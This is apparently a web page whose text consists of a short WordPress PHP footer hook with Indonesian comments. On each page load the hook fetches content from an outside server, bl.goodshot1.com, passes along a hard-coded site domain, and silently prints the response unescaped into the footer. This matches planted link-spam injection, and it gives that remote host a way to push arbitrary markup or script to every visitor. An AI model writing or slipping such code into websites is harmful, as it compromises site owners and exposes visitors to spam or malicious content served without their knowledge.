Skip to content
add_action('wp_footer', function() {
// Masukkan domain secara manual di sini
$my_domain = 'jobsmeindex.in';
$target_url = 'https://bl.goodshot1.com/anchor/1.php?url=' . $my_domain;
$opts = ["http" => ["timeout" => 5]];
$context = stream_context_create($opts);
$content = @file_get_contents($target_url, false, $context);
if ($content) {
echo "\n\n";
// Output konten dari server eksternal
echo '' . $content . '
';
echo "\n\n";
}
}, 999);